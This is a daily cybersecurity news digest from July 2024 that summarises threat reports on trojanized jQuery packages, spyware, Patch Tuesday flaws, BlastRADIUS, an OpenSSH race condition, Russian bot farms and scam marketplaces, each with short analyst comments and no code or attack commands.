Daily Drop (814): HuiOne | GuardZoo | RU: RT Bots | jQuery NPM | MSS: APT40 | Cyber HUMINT | Jenkins Script | BlastRADIUS | OpenSSH | ViperSoftX | Patch Tuesday | Hide & Seek | RU: Space Weapons
07-11-24
Wednesday, Jul 11 2024 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *
“Fears Over Russian Space-Based Indiscriminate Weapons”
Bottom Line Up Front (BLUF): Russia's recent satellite launch, Cosmos 2576, raises significant concerns about the potential weaponization of space. With the ability to disrupt low-earth orbit assets and the threat of indiscriminate nuclear-armed satellites, the global balance of power and space security treaties are at risk. This development may necessitate a robust response from the United States and its allies to safeguard their space-based systems.
Analyst Comments: The launch of Cosmos 2576 marks a concerning escalation in space militarization. Given Russia's historical and current capabilities, the deployment of counter-space weapons, including nuclear-armed satellites, could severely undermine global satellite infrastructure. This move challenges existing treaties and could trigger a new space arms race, compelling nations like the United States and China to enhance their defensive and offensive space capabilities. Diplomatic efforts and strategic alliances will be critical in addressing this emerging threat.
FROM THE MEDIA: Russia's launch of the Cosmos 2576 satellite from Plesetsk Cosmodrome has raised alarms in the United States and among international observers. U.S. officials believe this satellite could be a counter-space weapon aimed at low-earth orbit (LEO) satellites, including critical assets like reconnaissance satellites, the Hubble Telescope, and the International Space Station. The Outer Space Treaty of 1967, signed by 115 countries including the U.S., Russia, and China, prohibits the deployment of nuclear weapons in Earth orbit or on any celestial body. Despite this, historical precedents from both the U.S. and Soviet Union show a long-standing interest in developing space-based weapon systems. The U.S. revised its National Space Policy in 2006 to allow military actions in space to protect its assets, indirectly paving the way for space weaponization.
READ THE STORY: PR
Supply Chain Attack: Trojanized jQuery Packages Found on npm, GitHub, and jsDelivr
Bottom Line Up Front (BLUF): Threat actors have deployed a sophisticated supply chain attack involving trojanized versions of jQuery across npm, GitHub, and jsDelivr repositories. The malicious packages, which exfiltrate form data via a compromised "end" function, highlight the ongoing vulnerabilities in software supply chains.
Analyst Comments: This incident underscores the critical need for vigilant security practices in managing software dependencies. By exploiting widely used functions within popular libraries like jQuery, attackers can introduce malware that is difficult to detect and mitigate. Organizations must implement robust security measures, including regular audits of dependencies, to defend against such complex and persistent threats. The variability in the attacker’s approach suggests a highly manual process, indicating a deliberate and targeted effort. This case also illustrates the broader risks associated with the use of open-source software and the need for continuous monitoring and verification of code integrity.
FROM THE MEDIA: Unknown threat actors have launched a complex supply chain attack by disseminating trojanized versions of jQuery on npm, GitHub, and jsDelivr. The cybersecurity firm Phylum identified 68 malicious packages, first published on npm from May 26 to June 23, 2024. These packages used various names, including cdnjquery, footersicons, and jqueryxxx. The attack leverages the seldom-used "end" function within jQuery, which is internally called by the popular "fadeTo" animation utility. This function is modified to exfiltrate website form data to a remote server. The variability in package names and the manual assembly of these packages point to a concerted effort to avoid detection and automate processes.
READ THE STORY: THN
GuardZoo: Pro-Houthi Spyware Targets Militaries Across the Middle East
Bottom Line Up Front (BLUF): A pro-Houthi hacker group has been deploying the GuardZoo spyware since 2019 to target military personnel and organizations across the Middle East. The malware, which infiltrates devices via military-themed applications and other lures, collects sensitive data and can install additional malicious applications. The primary targets are located in Yemen, Saudi Arabia, Egypt, and Oman.
Analyst Comments: The emergence of GuardZoo spyware attributed to pro-Houthi hackers highlights the evolving cyber threat landscape in the Middle East. This group's ability to target military entities and gather extensive data, including location and communication details, underscores the strategic use of cyber tools in regional conflicts. The use of military-themed lures and the spyware's capabilities to introduce new invasive functionalities pose significant risks to military operations and personnel security. The ongoing geopolitical tensions in the region will likely drive further sophistication and deployment of such cyber tactics.
FROM THE MEDIA: Pro-Houthi hackers have been deploying the GuardZoo spyware to target militaries across the Middle East since 2019, according to a new report by Lookout, a mobile security firm. The spyware, attributed to a Houthi-aligned threat actor, has infected around 450 devices in countries including Yemen, Saudi Arabia, Egypt, Oman, the UAE, Turkey, and Qatar. GuardZoo malware is used to collect photos, documents, and other sensitive files from infected devices. It can also gather location data, and device information, and even download and install arbitrary applications, enabling further invasive actions.
READ THE STORY: The Record
Critical Windows Licensing Bugs and Exploited Vulnerabilities Highlight July Patch Tuesday
Bottom Line Up Front (BLUF): Microsoft's July Patch Tuesday addresses over 130 CVEs, with critical updates for actively exploited vulnerabilities in Windows Hyper-V and MSHTML. These critical patches for Citrix, SAP, and Fortinet products underscore the urgency of immediate deployment to mitigate exploitation risks.
Analyst Comments: The July Patch Tuesday underscores the increasing complexity and urgency in maintaining cybersecurity defenses. With at least two vulnerabilities under active exploitation and several others deemed critical, administrators must prioritize testing and deploying these patches to prevent potential breaches. The inclusion of Citrix and SAP in this cycle highlights the broad spectrum of targets that attackers are willing to exploit. It's crucial for organizations to audit and update their systems promptly, focusing particularly on internet-facing services and applications.
FROM THE MEDIA: Microsoft's July Patch Tuesday brings a significant number of updates, addressing over 130 CVEs. Key among these are two actively exploited vulnerabilities: CVE-2024-38080 in Windows Hyper-V, rated 7.8 CVSS, and CVE-2024-38112, a 7.5 CVSS-rated spoofing flaw in MSHTML. The former could allow attackers to gain system privileges, making it a potential tool for ransomware operations. The latter requires user interaction but has already been exploited in the wild, indicating the ease with which social engineering can trigger malicious actions.
READ THE STORY: The Register // The Stack
ViperSoftX Malware Disguises as eBooks on Torrents to Spread Stealthy Attacks
Bottom Line Up Front (BLUF): The ViperSoftX malware has evolved to distribute itself as eBooks over torrent sites. Utilizing the Common Language Runtime (CLR) to load PowerShell commands within AutoIt, this sophisticated malware evades detection and executes various malicious functions, including cryptocurrency theft and system data exfiltration.
Analyst Comments: The adaptation of ViperSoftX to distribute itself as eBooks on torrent sites marks a significant evolution in its delivery method. This tactic capitalizes on the popularity of pirated content to spread malware. The integration of CLR and PowerShell within AutoIt demonstrates the malware's advanced capabilities to avoid detection and maintain persistence. Security teams must prioritize awareness and proactive defenses against such evolving threats, emphasizing the need for robust monitoring and strict policies regarding the use of torrent sites within corporate environments.
FROM THE MEDIA: ViperSoftX, a sophisticated malware initially detected in 2020, has been observed spreading through torrents disguised as eBooks. Researchers from Trellix noted that the current variant of ViperSoftX uses the Common Language Runtime (CLR) to dynamically load and execute PowerShell commands within AutoIt, effectively creating a PowerShell environment for its operations. This approach allows the malware to evade traditional detection mechanisms that might flag standalone PowerShell activity.
READ THE STORY: THN
US Disrupts AI-Driven Russian Bot Farm on Twitter
Bottom Line Up Front (BLUF): A collaborative international law enforcement operation led by the U.S. Justice Department has dismantled a sophisticated Russian bot farm that used AI to propagate disinformation on Twitter. Nearly 1,000 Twitter accounts and several domains used to manage the bots were taken down. The bot farm was managed by affiliates of the Russian state-run news organization Russia Today (RT) and aimed at influencing public opinion and exacerbating discord in multiple countries.
Analyst Comments: The dismantling of this AI-powered bot farm represents a significant step in combating state-sponsored disinformation campaigns. The use of AI in creating authentic-looking social media profiles marks an escalation in the sophistication of propaganda tools used by state actors. This operation underscores the importance of international collaboration in addressing the complex challenges posed by cyber threats. The ability of these bots to influence geopolitical narratives underscores the need for continuous vigilance and enhanced cybersecurity measures across social media platforms.
FROM THE MEDIA: A large-scale international operation has disrupted a Russian bot farm managed by Russia Today (RT) affiliates and a Russian FSB officer, which has been disseminating disinformation on Twitter since 2022. The AI-enabled software, Meliorator, was used to create and manage nearly 1,000 Twitter accounts posing as real people from various countries, including the United States, Poland, Germany, and Ukraine. The bot farm's purpose was to amplify false narratives and align with Russian geopolitical interests, especially regarding the conflict in Ukraine. The operation, led by the U.S. Justice Department and supported by agencies from Canada and the Netherlands, resulted in the seizure of domains and the takedown of the bot accounts.
READ THE STORY: The Register // Bleeping Computer
Cybersecurity Agencies Warn of China-linked APT40's Rapid Exploit Adaptation
Bottom Line Up Front (BLUF): Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about APT40, a China-linked cyber espionage group. The advisory underscores APT40's ability to rapidly adapt and weaponize newly disclosed vulnerabilities, posing significant threats to global cybersecurity.
Analyst Comments: APT40's proficiency in quickly co-opting exploits for newly disclosed security flaws showcases the group's advanced capabilities and operational agility. This ability to swiftly weaponize proofs-of-concept emphasizes the need for organizations to implement robust, proactive security measures. Regular updates, patch management, and comprehensive network monitoring are essential to mitigate risks. The advisory also highlights the broader geopolitical implications of cyber espionage activities orchestrated by state-sponsored groups, underscoring the critical need for international cooperation in cybersecurity defense.
FROM THE MEDIA: Cybersecurity agencies from multiple countries have released a joint advisory warning about APT40, a China-linked cyber espionage group. Known for its rapid adaptation to newly disclosed vulnerabilities, APT40 has previously targeted organizations in countries including Australia and the United States. The group, active since at least 2011, is affiliated with China's Ministry of State Security (MSS). APT40 is notorious for its ability to transform vulnerability proofs-of-concept into targeted exploitation operations within hours or days of public release. This capability has been demonstrated through various campaigns, including the use of the ScanBox reconnaissance framework and exploiting a WinRAR security flaw (CVE-2023-38831) in phishing campaigns.
READ THE STORY: THN // The Record
Navigating the Maze of Modern Data Breaches: Essential Strategies for Cybersecurity Practitioners and Data Owners to Secure Data Across the Entire Enterprise
Bottom Line Up Front (BLUF): Data breaches have become increasingly complex, with data scattered across various environments. Effective incident detection, response, and recovery strategies are critical for cybersecurity practitioners and data owners to mitigate damage and protect sensitive information.
Analyst Comments: James Azar’s insights highlight the ongoing challenges in modern cybersecurity, particularly around data breach management. The emphasis on proactive detection and coordinated response is crucial, especially as threat actors become more sophisticated. Practitioners must continually evolve their strategies, integrating advanced tools like SIEM systems and maintaining robust incident response protocols. Understanding the distributed nature of data and the necessity for comprehensive security measures can significantly reduce breach impacts.
FROM THE MEDIA: James Azar discusses the multifaceted challenges of managing and locating data during a breach, emphasizing the need for effective mitigation strategies. Data breaches have grown in complexity, driven by both sophisticated nation-state actors and opportunistic cybercriminals. The primary challenge is the modern data ecosystem, which is vast, distributed, and decentralized, spanning cloud environments, endpoint devices, and third-party service providers.
READ THE STORY: CISOTALK
Russia Begins Influence Operations Targeting 2024 U.S. Presidential Election
Bottom Line Up Front (BLUF): U.S. intelligence officials report that Russia has started efforts to influence the 2024 U.S. presidential election, favoring former President Donald Trump. The operations involve targeting specific voter demographics, spreading divisive narratives, and undermining support for Ukraine. This marks a continuation of strategies observed in the 2016 and 2020 elections.
Analyst Comments: The revelation that Russia is already engaging in influence operations for the 2024 U.S. presidential election is indicative of a persistent and evolving threat to American electoral integrity. The use of sophisticated techniques, including outsourcing to commercial firms and leveraging encrypted messaging platforms, highlights Moscow's adaptability. The continuation of these efforts underscores the importance of vigilance and robust countermeasures by U.S. intelligence and cybersecurity agencies to safeguard the democratic process.
FROM THE MEDIA: Russia has commenced attempts to influence the 2024 U.S. presidential election, aiming to favor former President Donald Trump, according to a U.S. intelligence official. These efforts involve targeting specific voter demographics, promoting divisive narratives, and denigrating particular politicians. The intelligence community observed similar strategies in the 2016 and 2020 elections. An official from the Office of the Director of National Intelligence (ODNI) noted that Russia is employing a variety of methods to amplify its messaging, including outsourcing tasks to commercial firms to obscure its involvement. Additionally, influence actors are using social media covertly to target swing state voters and reduce U.S. support for Ukraine.
READ THE STORY: The Record
Hackers Exploiting Jenkins Script Console for Cryptocurrency Mining Attacks
Bottom Line Up Front (BLUF): Attackers are leveraging misconfigured Jenkins Script Console instances to execute remote code and deploy cryptocurrency miners. Ensuring proper configuration, robust authentication, and regular audits can mitigate these risks.ce.
Analyst Comments: The exploitation of Jenkins Script Console highlights the critical need for secure configurations in continuous integration and delivery platforms. The ability to run arbitrary Groovy scripts within the Jenkins environment, if improperly secured, provides an open gateway for malicious actors to execute harmful code. This incident underscores the importance of stringent access controls and continuous monitoring to prevent unauthorized access and exploitation.
FROM THE MEDIA: Attackers are exploiting misconfigured Jenkins Script Console instances to conduct cryptocurrency mining attacks, according to cybersecurity researchers from Trend Micro. Jenkins, a widely used CI/CD platform, features a Groovy script console that allows users to run arbitrary scripts within the Jenkins controller runtime. When authentication mechanisms are improperly configured, the "/script" endpoint can become accessible to attackers, enabling remote code execution (RCE). The Jenkins documentation warns that granting Script Console access is akin to providing full administrative rights, posing significant security risks if misconfigured.
READ THE STORY: THN
RADIUS Protocol Vulnerability Exposes Networks to MitM Attacks
Bottom Line Up Front (BLUF): A critical security vulnerability, dubbed BlastRADIUS, has been discovered in the RADIUS network authentication protocol, exposing networks to Mallory-in-the-Middle (MitM) attacks. This flaw allows attackers to bypass integrity checks, posing significant risks to organizations using RADIUS for authentication.
Analyst Comments: The BlastRADIUS vulnerability underscores the ongoing risks associated with legacy protocols like RADIUS, which rely on outdated cryptographic methods such as MD5. The ability to intercept and modify authentication packets without detection presents a severe threat to network security, especially for ISPs and organizations transmitting RADIUS traffic over the internet. Immediate mitigation steps, including upgrading to secure protocols like TLS and IPSec, are crucial to safeguarding against potential exploits.
FROM THE MEDIA: A newly discovered security vulnerability in the RADIUS network authentication protocol, identified as BlastRADIUS (CVE-2024-3596), could be exploited to perform Mallory-in-the-Middle (MitM) attacks. This flaw allows attackers to modify Access-request packets due to the absence of integrity or authentication checks in certain messages, enabling unauthorized authentication and access manipulation. RADIUS, or Remote Authentication Dial-In User Service, is widely used for centralized authentication, authorization, and accounting (AAA) management. The protocol's security depends on a hash derived using the now-cryptographically broken MD5 algorithm. This vulnerability arises from a fundamental design flaw in the protocol, making all standards-compliant RADIUS clients and servers susceptible.
READ THE STORY: THN
New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk
Bottom Line Up Front (BLUF): A new vulnerability, CVE-2024-6409, has been identified in OpenSSH versions 8.7p1 and 8.8p1, which could lead to remote code execution (RCE). This flaw, similar to CVE-2024-6387, arises from a race condition in signal handling, primarily impacting Red Hat Enterprise Linux 9 deployments.
Analyst Comments: The discovery of CVE-2024-6409 highlights the persistent vulnerabilities within OpenSSH, a widely used secure networking suite. The race condition in the signal handling process underscores the need for immediate attention and patching, particularly for systems running vulnerable versions. The fact that an active exploit for CVE-2024-6387 has already been detected in the wild further emphasizes the critical nature of these vulnerabilities. Organizations should prioritize updating their OpenSSH implementations and consider additional security measures to mitigate potential RCE attacks.
FROM THE MEDIA: A new security vulnerability, CVE-2024-6409, has been discovered in select versions of OpenSSH, potentially enabling remote code execution (RCE). This vulnerability, which affects OpenSSH versions 8.7p1 and 8.8p1 on Red Hat Enterprise Linux 9, was identified by security researcher Alexander Peslyak (Solar Designer). It stems from a race condition in signal handling within the privsep child process of the OpenSSH daemon. This issue, closely related to CVE-2024-6387, involves a race condition triggered by the asynchronous handling of the SIGALRM signal, leading to the invocation of functions that are not async-signal-safe. The vulnerability is particularly concerning as it allows an attacker to exploit the OpenSSH daemon, potentially gaining RCE capabilities within the unprivileged user context running the sshd server.
Crypto Analysts Expose HuiOne Guarantee's $11 Billion Cybercrime Transactions
Bottom Line Up Front (BLUF): HuiOne Guarantee, an online marketplace linked to Southeast Asian cybercriminals, has been involved in transactions worth at least $11 billion, aiding in money laundering and pig butchering scams. The platform, part of the Cambodian HuiOne Group, provides services that support fraudulent activities, including moving money, developing scam websites, and selling tools for coercion and torture.
Analyst Comments: The exposure of HuiOne Guarantee underscores the expansive scale and sophistication of cybercrime operations in Southeast Asia. With connections to high-level political figures and advanced money laundering capabilities, HuiOne represents a significant challenge for law enforcement. The platform's integration with mainstream financial services and use of instant messaging channels for transactions highlight the evolving tactics of cybercriminals. Collaborative international efforts and stringent regulatory measures are essential to dismantle such networks and curb their operations.
FROM THE MEDIA: Cryptocurrency analysts have unveiled the illicit activities of HuiOne Guarantee, an online marketplace used extensively by cybercriminals in Southeast Asia, particularly for pig butchering scams. According to Elliptic, a British blockchain analytics firm, HuiOne Guarantee, established in 2021, operates under the Cambodian conglomerate HuiOne Group, which has connections to Cambodia's ruling Hun family. HuiOne International Payments, another subsidiary of HuiOne Group, plays a crucial role in laundering scam proceeds globally. HuiOne Guarantee's platform is utilized by thousands of merchants who offer technology, data, and money laundering services, accumulating transactions totaling at least $11 billion. While the marketplace ostensibly caters to real estate and car sales, most offerings are designed to aid cyber scam operators. These services include moving and exchanging money, laundering proceeds, and facilitating the creation of scam investment websites. Additionally, merchants provide tools for coercion, such as tear gas and electronic shackles, to imprison and torture workers within scam compounds.
READ THE STORY: THN
Despite U.S. Sanctions, Chinese GPU Maker Strives to Compete with Nvidia
Bottom Line Up Front (BLUF): Moore Threads, a Chinese GPU manufacturer, has significantly increased its datacenter AI systems' capacity, now supporting clusters of up to 10,000 GPUs. This expansion aims to provide an alternative to Nvidia's AI accelerators, which are restricted in China due to U.S. export controls. While still trailing behind Nvidia in performance, Moore Threads' progress marks a notable development in China's effort to build self-sufficient AI and computing infrastructure.
Analyst Comments: Moore Threads' leap to 10,000 GPU clusters demonstrates China's determination to circumvent U.S. technological restrictions and bolster its domestic AI capabilities. The strategic push aligns with China's broader goals to enhance national computing power and reduce dependency on foreign technology. Despite the technological gap with Nvidia, the ongoing developments in Moore Threads and potential advancements in domestic high-bandwidth memory production suggest a growing competitive landscape. This scenario underscores the geopolitical stakes in the tech arms race and the strategic importance of self-reliance in critical technologies.
FROM THE MEDIA: Chinese GPU vendor Moore Threads announced that its data center AI systems can now support clusters of up to 10,000 accelerators, marking a tenfold increase from its previous capabilities. This significant expansion was revealed in a statement to the South China Morning Post. Moore Threads, facing U.S. export restrictions since being added to the U.S. Entities list in 2023, has developed the MTT S4000 chips featuring 8,192 vector cores and 128 tensor cores. Each chip delivers up to 100 teraFLOPS of FP16/BF16 and 200 TOPS of Int8 performance, with 48GB of VRAM. Initially supporting clusters of 1,000 units, the new advancements now allow up to 10,000 GPUs to be interconnected via high-speed networks.
READ THE STORY: The Register
Items of interest
HUMINT: Exploring the Underground Economy of Cybercrime
Bottom Line Up Front (BLUF): The Dark Web is a complex and evolving ecosystem where cybercriminals conduct illicit activities. Threat intelligence professionals divide the internet into Clear Web, Deep Web, and Dark Web, each with distinct characteristics. Understanding and countering cyber threats require both automated tools and Human Intelligence (HUMINT), which involves law enforcement officers engaging with cybercriminals to gather actionable intelligence.
Analyst Comments: The exploration of Dark Web forums reveals a highly organized marketplace where cybercriminals buy and sell services. The persistence of these activities, despite law enforcement efforts, highlights the need for continuous adaptation in cybersecurity strategies. The integration of HUMINT into cybersecurity operations provides valuable insights that automated tools alone cannot achieve. This approach is essential for staying ahead of sophisticated threats and protecting against network attacks.
FROM THE MEDIA: The Dark Web is an anonymous and closed part of the internet where cybercriminals thrive, conducting activities away from the eyes of law enforcement. Unlike the Clear Web, which is indexed by search engines, the Dark Web requires specific software like Tor for access, offering a higher level of security and anonymity. Tor, originally developed by the U.S. Naval Research Laboratory, allows for encrypted communication across multiple layers, making it difficult to trace the user's IP address. This secure environment has made Tor popular for illegal activities, including selling drugs, fake identities, and hacking services.
READ THE STORY: THN
Incorporating Human Intelligence (HUMINT) into An Information Security Team (Video)
FROM THE MEDIA: Incorporating Human Intelligence (HUMINT) into An Information Security Team
"For criminals, by criminals:" How the FBI Tried to Wire Tap the World (Video)
FROM THE MEDIA: A special phone, made from top-to-bottom with privacy, hidden apps and encryption to protect your data from prying eyes. Sounds great, right? There's only one problem: It has a secret back door that funnels everything you do to law enforcement.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.